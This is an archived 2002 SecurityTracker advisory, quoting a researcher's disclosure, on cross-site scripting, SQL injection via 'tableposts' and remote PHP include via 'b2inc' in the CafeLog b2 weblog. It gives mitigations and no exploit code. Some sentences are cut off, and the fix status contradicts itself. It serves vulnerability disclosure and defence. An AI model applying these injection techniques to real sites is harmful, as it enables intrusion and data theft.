b2 Weblog Has Multiple Holes That Let Remote Users Inject SQL Commands, Execute Commands on the System, and Conduct Cross-site Scripting Attacks
SecurityTracker Alert ID: 1005043|
SecurityTracker URL: http://securitytracker.com/id/1005043
(Links to External Site)
Date: Aug 14 2002
Disclosure of authentication information, Execution of arbitrary code via network, Modification of user information, User access via network|
Fix Available: Yes Vendor Confirmed: Yes Exploit Included: Yes |
Several vulnerabilities were reported in the 'b2' weblog software. A remote user can execute commands on the web server, manipulate database contents, and conduct cross-site scripting attacks against b2 users.|
It is reported that multiple variables are not properly initialized or filtered, resulting in several exploit possibilities.
In some cases, a remote user can set a GPC variable that will echo back HTML code to the reader's browser, allowing for cross-site scripting attacks. A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running b2 and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.
It is also reported that, in several cases, the "tableposts" variable is not properly filtered. If the "magic_quotes_gpc" option is not enabled, a remote user can inject SQL commands to be executed by the underlying database.
The "b2inc" variable is apparently used as a portion of an include file path. A remote user can set the variable via GPC to refer to PHP code on a remote server, causing arbitrary commands to be executed on the target server with the privileges of the web server.
A remote user can access the target user's cookies (including authentication cookies), if any, associated with the b2 site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.|
A remote user may be able to inject SQL commands to be executed by the underlying database server.
A remote user may be able to execute arbitrary commands on the server with the privileges of the web server.
No solution was available at the time of this entry.|
Vendor URL: www.cafelog.com/ (Links to External Site)
Input validation error|
|Underlying OS: Linux (Any), UNIX (Any), Windows (Any)|
Source Message Contents
Subject: Multiple Vulnerabilities in CafeLog Weblog Package|
Security Advisory: Multiple Vulnerabilities in CafeLog Weblog Package
Additional Details: http://www.murphy.101main.net/vulns/2002-26.txt
Issue: Multiple vulnerabilities -- the most serious could allow malicious
users to execute commands against a web server running the vulnerable
Scope: Command execution, database manipulation, and
Affected software: CafeLog b2 Weblog Tool 2.06pre4 confirmed;
Numerous serious vulnerabilities exist in the "b2" weblog tool by
CafeLog. Numerous variables are not properly initialized or sanitized,
allowing for several unsafe actions.
There are numerous cases of small bits of data being echoed back
to the browser from variables that can be remotely set by a GPC
variable. This enables a simple cross-site scripting attack.
Further, there are several cases where the "tableposts" variable is
used without proper sanitation. If the machine does not have the option
"magic_quotes_gpc" enabled, an SQL injection attack can be levied
against the backend database. However, this may be hampered by
reported bugs in the PHP mysql_query() function (it only completes
the first query in a series) that prevent multiple queries from being
Also, the variable "b2inc" is used as a portion of an include file
if this variable is set via GPC, commands can be executed or arbitrary
There are significant mitigating factors to both the SQL injection
and command-execution vulnerabilities. The SQL injection flaw can
only be exploited if magic_quotes_gpc has been disabled. The SQL
injection may be further hampered by an issue in the PHP mysql_query()
function -- it only executes one query at a time.
Further, the command execution should be limited to the rights of the
PHP user, barring exploitation of additional vulnerabilities. On Unix,
this should be nobody/nobody. On Windows NT/2000/XP, this may
be the privileges of the IIS Internet Web Account Manager (IWAM),
equivalent to a guest user. On other NT servers, this will be a similar
Enabling magic_quotes_gpc eliminates the SQL injection and file reading
Disabling allow_fopen_url eliminates the command execution vulnerabilities
However, the cross-site scripting vulnerabilities must be eliminated by a
patch to the application.
"The reason the mainstream is thought
of as a stream is because it is
- Author Unknown
Go to the Top of This SecurityTracker Archive Page